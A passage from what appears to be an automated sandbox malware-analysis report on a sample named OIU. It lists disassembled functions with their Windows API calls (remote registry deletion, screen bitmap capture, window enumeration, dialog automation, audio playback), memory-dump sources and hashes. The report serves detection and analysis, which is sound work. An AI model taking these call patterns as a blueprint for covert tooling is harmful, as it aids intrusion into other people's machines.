                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3840717409-0
                                                                      • Opcode ID: c401f22a0ae686673e2cac2a7e48ad999b53354bc73eba01c4abcffa6b05c218
                                                                      • Instruction ID: 58b6dd401ccec6fa8b0ee3be4bb1eb067f5a31db876c04bddb644f213d326417
                                                                      • Opcode Fuzzy Hash: c401f22a0ae686673e2cac2a7e48ad999b53354bc73eba01c4abcffa6b05c218
                                                                      • Instruction Fuzzy Hash: 46412875610208AFDB119FA5CC89FAF7BB8FF89B11F108059F915E7260DB319A05DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C114BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(00000000), ref: 00C11502
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00C1150B
                                                                      • VariantClear.OLEAUT32(?), ref: 00C11517
                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C115FB
                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00C11657
                                                                      • VariantInit.OLEAUT32(?), ref: 00C11708
                                                                      • SysFreeString.OLEAUT32(?), ref: 00C1178C
                                                                      • VariantClear.OLEAUT32(?), ref: 00C117D8
                                                                      • VariantClear.OLEAUT32(?), ref: 00C117E7
                                                                      • VariantInit.OLEAUT32(00000000), ref: 00C11823
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                      • API String ID: 1234038744-3931177956
                                                                      • Opcode ID: 34dba2356f8c9a9b4ee83df562348fe8b189ccb597aad4f2b4c8008ab055cf80
                                                                      • Instruction ID: 63cec1f56a1cf3c24d126d50ad4a6ae5f36b218ed84ba707115adec0662e8d8e
                                                                      • Opcode Fuzzy Hash: 34dba2356f8c9a9b4ee83df562348fe8b189ccb597aad4f2b4c8008ab055cf80
                                                                      • Instruction Fuzzy Hash: FDD11531A00119DBCB109F65D884BFDB7F6BF46700F188095FA56AB180DB78DD80EB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                        • Part of subcall function 00C2C998: CharUpperBuffW.USER32(?,?), ref: 00C2C9B5
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2C9F1
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA68
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA9E
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2B6F4
                                                                      • RegOpenKeyExW.ADVAPI32 ref: 00C2B772
                                                                      • RegDeleteValueW.ADVAPI32 ref: 00C2B80A
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C2B87E
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C2B89C
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C2B8F2
                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C2B904
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C2B922
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00C2B983
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C2B994
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 146587525-4033151799
                                                                      • Opcode ID: 70fdcc626daf5fb7f9896aff8cdec3e8a24bec4f8e8fb9f991d63fcb9080ee01
                                                                      • Instruction ID: e728d59b44ad61e70c00fb147a64a07fccf3b152c4fd47685b07e4c17a5f94b8
                                                                      • Opcode Fuzzy Hash: 70fdcc626daf5fb7f9896aff8cdec3e8a24bec4f8e8fb9f991d63fcb9080ee01
                                                                      • Instruction Fuzzy Hash: B6C1AC34208211AFD714DF24D495F2ABBE5FF85308F14849CF5AA8B6A2CB31ED45CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00C225D8
                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C225E8
                                                                      • CreateCompatibleDC.GDI32(?), ref: 00C225F4
                                                                      • SelectObject.GDI32(00000000,?), ref: 00C22601
                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C2266D
                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00C226AC
                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00C226D0
                                                                      • SelectObject.GDI32(?,?), ref: 00C226D8
                                                                      • DeleteObject.GDI32(?), ref: 00C226E1
                                                                      • DeleteDC.GDI32(?), ref: 00C226E8
                                                                      • ReleaseDC.USER32(00000000,?), ref: 00C226F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                      • String ID: (
                                                                      • API String ID: 2598888154-3887548279
                                                                      • Opcode ID: 5a41b37b54945c584e7b77261ef35775d18810c74a0be0a215843abacce3fd37
                                                                      • Instruction ID: d9c3d8764872d0bed250352a0da5b2ecf236cbb56823d4d0eb9d3bca2b23d0b8
                                                                      • Opcode Fuzzy Hash: 5a41b37b54945c584e7b77261ef35775d18810c74a0be0a215843abacce3fd37
                                                                      • Instruction Fuzzy Hash: 4261E276D00219EFCF14CFA8D884AAEBBF6FF48310F208529E955A7250D774A951DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BDDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___free_lconv_mon.LIBCMT ref: 00BDDAA1
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD659
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD66B
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD67D
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD68F
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6A1
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6B3
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6C5
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6D7
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6E9
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6FB
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD70D
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD71F
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD731
                                                                      • _free.LIBCMT ref: 00BDDA96
                                                                        • Part of subcall function 00BD29C8: HeapFree.KERNEL32(00000000,00000000), ref: 00BD29DE
                                                                        • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                                      • _free.LIBCMT ref: 00BDDAB8
                                                                      • _free.LIBCMT ref: 00BDDACD
                                                                      • _free.LIBCMT ref: 00BDDAD8
                                                                      • _free.LIBCMT ref: 00BDDAFA
                                                                      • _free.LIBCMT ref: 00BDDB0D
                                                                      • _free.LIBCMT ref: 00BDDB1B
                                                                      • _free.LIBCMT ref: 00BDDB26
                                                                      • _free.LIBCMT ref: 00BDDB5E
                                                                      • _free.LIBCMT ref: 00BDDB65
                                                                      • _free.LIBCMT ref: 00BDDB82
                                                                      • _free.LIBCMT ref: 00BDDB9A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                      • String ID:
                                                                      • API String ID: 161543041-0
                                                                      • Opcode ID: 3eb781de87d3da5c8c44c8539c5e7bf1a3b7062f50dadc82918479f10d7f7300
                                                                      • Instruction ID: e223bb26a51d9ea730e9cc9c2287456d3a94fc1fb92a36635a21e916effad5ef
                                                                      • Opcode Fuzzy Hash: 3eb781de87d3da5c8c44c8539c5e7bf1a3b7062f50dadc82918479f10d7f7300
                                                                      • Instruction Fuzzy Hash: DE315A356046459FEB21AB38E845B6AF7E8FF10314F1584ABE489D7391FA34AC409B20
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C0369C
                                                                      • _wcslen.LIBCMT ref: 00C036A7
                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C03797
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C0380C
                                                                      • GetDlgCtrlID.USER32 ref: 00C0385D
                                                                      • GetWindowRect.USER32(?,?), ref: 00C03882
                                                                      • GetParent.USER32(?), ref: 00C038A0
                                                                      • ScreenToClient.USER32(00000000), ref: 00C038A7
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C03921
                                                                      • GetWindowTextW.USER32 ref: 00C0395D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                      • String ID: %s%u
                                                                      • API String ID: 4010501982-679674701
                                                                      • Opcode ID: 6565902acb1d345fa174629a84ae3e51fb938cad81489d18f656053019c11cd8
                                                                      • Instruction ID: 8de6e12f5f6a555d261b9e6daa6b5b5c8c73d761f517ce660d75ff8fe8af9335
                                                                      • Opcode Fuzzy Hash: 6565902acb1d345fa174629a84ae3e51fb938cad81489d18f656053019c11cd8
                                                                      • Instruction Fuzzy Hash: CE918C71204646AFDB19DF24C885FAAB7ECFF44350F008629F9A9D21D1DB30EA55CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C04954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C04994
                                                                      • GetWindowTextW.USER32 ref: 00C049DA
                                                                      • _wcslen.LIBCMT ref: 00C049EB
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00C049F7
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00C04A2C
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00C04A64
                                                                      • GetWindowTextW.USER32 ref: 00C04A9D
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00C04AE6
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C04B20
                                                                      • GetWindowRect.USER32(?,?), ref: 00C04B8B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                      • String ID: ThumbnailClass
                                                                      • API String ID: 1311036022-1241985126
                                                                      • Opcode ID: 71845048ac4aa543b684155eeb36bcb2ece8c145160158a26521ee4cd9ad2c36
                                                                      • Instruction ID: 4a447998a54827e620849f869387d999732e62eec11d0ac52c9e8562a894913a
                                                                      • Opcode Fuzzy Hash: 71845048ac4aa543b684155eeb36bcb2ece8c145160158a26521ee4cd9ad2c36
                                                                      • Instruction Fuzzy Hash: 5A919CB21082059BDB18DF14C985FAB77E8FF84354F048469FE959A0D6EB30EE45CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C38D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                                      • PostMessageW.USER32 ref: 00C38D5A
                                                                      • GetFocus.USER32 ref: 00C38D6A
                                                                      • GetDlgCtrlID.USER32 ref: 00C38D75
                                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00C38E1D
                                                                      • GetMenuItemInfoW.USER32 ref: 00C38ECF
                                                                      • GetMenuItemCount.USER32(?), ref: 00C38EEC
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00C38EFC
                                                                      • GetMenuItemInfoW.USER32 ref: 00C38F2E
                                                                      • GetMenuItemInfoW.USER32 ref: 00C38F70
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C38FA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                      • String ID: 0
                                                                      • API String ID: 1026556194-4108050209
                                                                      • Opcode ID: 8e00259de30f967fa17e90e1e23b19be693b4931d8a61c5fcdb8a8517c89394f
                                                                      • Instruction ID: 54b9bc9255a1a2ce1042d32657c922e723273af9aca3f4d11a6f07f1f21db1a6
                                                                      • Opcode Fuzzy Hash: 8e00259de30f967fa17e90e1e23b19be693b4931d8a61c5fcdb8a8517c89394f
                                                                      • Instruction Fuzzy Hash: BC81CF715183019FDB20CF24C884AAFBBE9FF88314F14095DF9A4A7291DB70DA08DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C2CC64
                                                                      • RegOpenKeyExW.ADVAPI32 ref: 00C2CC8D
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C2CD48
                                                                        • Part of subcall function 00C2CC34: RegCloseKey.ADVAPI32(?), ref: 00C2CCAA
                                                                        • Part of subcall function 00C2CC34: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C2CCBD
                                                                        • Part of subcall function 00C2CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW,?,?,00000000), ref: 00C2CCCF
                                                                        • Part of subcall function 00C2CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C2CD05
                                                                        • Part of subcall function 00C2CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C2CD28
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C2CCF3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 2734957052-4033151799
                                                                      • Opcode ID: f3bd8e2c752665007434adedbdf21698e20e75d6a941434c1bf78b294d5364d8
                                                                      • Instruction ID: 0e58cf50d1e116c287d4149a66197beb8a184db695e6b8c52b49a2c846b64817
                                                                      • Opcode Fuzzy Hash: f3bd8e2c752665007434adedbdf21698e20e75d6a941434c1bf78b294d5364d8
                                                                      • Instruction Fuzzy Hash: EE315A76901129BBDB208B65ECC8FFFBB7CEF45750F000165E916E3240DA749A45ABA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • timeGetTime.WINMM ref: 00C0E6B4
                                                                        • Part of subcall function 00BBE551: timeGetTime.WINMM ref: 00BBE555
                                                                      • Sleep.KERNEL32(0000000A), ref: 00C0E6E1
                                                                      • EnumThreadWindows.USER32 ref: 00C0E705
                                                                      • FindWindowExW.USER32 ref: 00C0E727
                                                                      • SetActiveWindow.USER32 ref: 00C0E746
                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C0E754
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C0E773
                                                                      • Sleep.KERNEL32(000000FA), ref: 00C0E77E
                                                                      • IsWindow.USER32 ref: 00C0E78A
                                                                      • EndDialog.USER32 ref: 00C0E79B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                      • String ID: BUTTON
                                                                      • API String ID: 1194449130-3405671355
                                                                      • Opcode ID: 4e0b38c9e1dd85083a57bcf917b7320e26c9788b2e8b0b1cabab5acd3159cf4f
                                                                      • Instruction ID: 3ada18c06d76c8fb49f3d3e6b204ad62943dbf76e9a2c520443a1bd2a4e04ceb
                                                                      • Opcode Fuzzy Hash: 4e0b38c9e1dd85083a57bcf917b7320e26c9788b2e8b0b1cabab5acd3159cf4f
                                                                      • Instruction Fuzzy Hash: 7C21A570250604AFEB106F64ECC9B2D3B6DF754389F140825F91AD11F1DB71AC40EB24
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C0EA5D
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C0EA73
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C0EA84
                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C0EA96
                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C0EAA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$_wcslen
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 2420728520-1007645807
                                                                      • Opcode ID: 237b41ce87fae28573b328069e50e95909649a4d98c262dfab6d2a211f19f668
                                                                      • Instruction ID: 4682a41bcde6883a448c531ccc4dc2c5da70cbf21a7ea02c60dceae94b16deac
                                                                      • Opcode Fuzzy Hash: 237b41ce87fae28573b328069e50e95909649a4d98c262dfab6d2a211f19f668
                                                                      • Instruction Fuzzy Hash: 82113731A9426979D720A762DC8AEFF6ABCEFD6F40F4408797811A20D1EFB05A45C5B0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSysColorBrush.USER32 ref: 00BA2D07
                                                                      • RegisterClassExW.USER32(00000030), ref: 00BA2D31
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BA2D42
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00BA2D5F
